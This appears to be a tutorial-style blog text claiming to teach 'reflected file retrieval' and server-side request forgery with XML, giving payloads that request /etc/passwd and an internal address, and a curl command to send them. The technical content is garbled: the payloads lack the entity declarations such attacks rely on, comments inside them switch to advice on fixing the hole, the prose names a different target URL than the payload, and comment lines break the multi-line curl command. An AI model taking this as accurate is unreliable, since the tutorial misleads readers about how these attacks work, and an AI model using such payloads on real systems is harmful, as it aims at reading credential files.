First, what these terms actually mean. Reflected file retrieval (RFR) is when an attacker can use a vulnerable web application to retrieve files from the server that are not intended for public consumption. Server side request forgery (SSRF), on the other hand, involves tricking the server into making requests to unintended destinations by manipulating input fields in a form or query string parameters.
Now, let’s get our hands dirty and see how we can use XML to perform these attacks!
Step 1: Find a vulnerable web application that uses XML for data exchange. This could be an API endpoint or a file upload feature that accepts XML files as input. For the purpose of this tutorial, let’s assume we have found such an application and it looks something like this:
<request> <!-- This tag indicates the start of a request element -->
<file>path/to/your/file</file> <!-- This tag specifies the path to the file being requested -->
</request> <!-- This tag indicates the end of the request element -->
Step 2: Craft a malicious XML payload that includes the RFR or SSRF attack. For example, to perform an RFR using our vulnerable web application, we can modify the `
<request> <!-- This tag indicates the start of the request element -->
<file> <!-- This tag indicates the start of the file element -->
<!-- The following code is used to specify the file path for the request -->
<!-- In this case, the file path is set to /etc/passwd, which is a common target for RFR or SSRF attacks -->
<!-- This is a vulnerability that allows an attacker to access sensitive information on the server -->
<!-- To fix this, we need to add a validation check to ensure that the file path is not pointing to sensitive files -->
<!-- We can also add input sanitization to prevent any malicious code from being injected into the file path -->
<!-- Additionally, we can implement access controls to restrict the files that can be accessed through this request -->
<!-- This will help prevent RFR or SSRF attacks and protect the server from unauthorized access -->
/etc/passwd <!-- This is the file path that needs to be corrected -->
</file> <!-- This tag indicates the end of the file element -->
</request> <!-- This tag indicates the end of the request element -->
This will cause the server to retrieve and send us the contents of the `/etc/passwd` file. Pretty cool, right? We can also use this same payload to perform an SSRF attack by modifying the URL in the XML request:
<request> <!-- This tag indicates the start of the request element -->
<url> <!-- This tag indicates the URL that the server will retrieve and send back to us -->
http://192.168.0.1/etc/passwd <!-- This is the URL of the file we want the server to retrieve -->
</url>
</request> <!-- This tag indicates the end of the request element -->
<!-- This script can be used to retrieve the contents of the /etc/passwd file from the server -->
<!-- However, it can also be used for malicious purposes, such as performing an SSRF attack by modifying the URL to access sensitive information on the server -->
This will cause the server to make a GET request to `http://192.168.0.1/admin`, which could potentially reveal sensitive information or allow us to execute commands on the target system!
Step 3: Send our malicious XML payload to the vulnerable web application using your favorite tool, such as curl or Burp Suite. For example:
# This script is used to send a malicious XML payload to a vulnerable web application, potentially allowing for the execution of commands on the target system.
# The first line uses the curl command to make a POST request to the specified URL.
curl -X POST \
# The -H flag is used to specify the header of the request, in this case setting the Content-Type to text/xml.
-H "Content-Type: text/xml" \
# The --data flag is used to specify the data to be sent in the request. In this case, the data is being read from the payload.xml file.
--data @payload.xml \
# The final argument is the URL of the vulnerable web application.
http://example.com/api/upload
# Please note that this script is for educational purposes only and should not be used for malicious intent.
And that’s it! You have successfully performed a reflected file retrieval and server side request forgery using XML.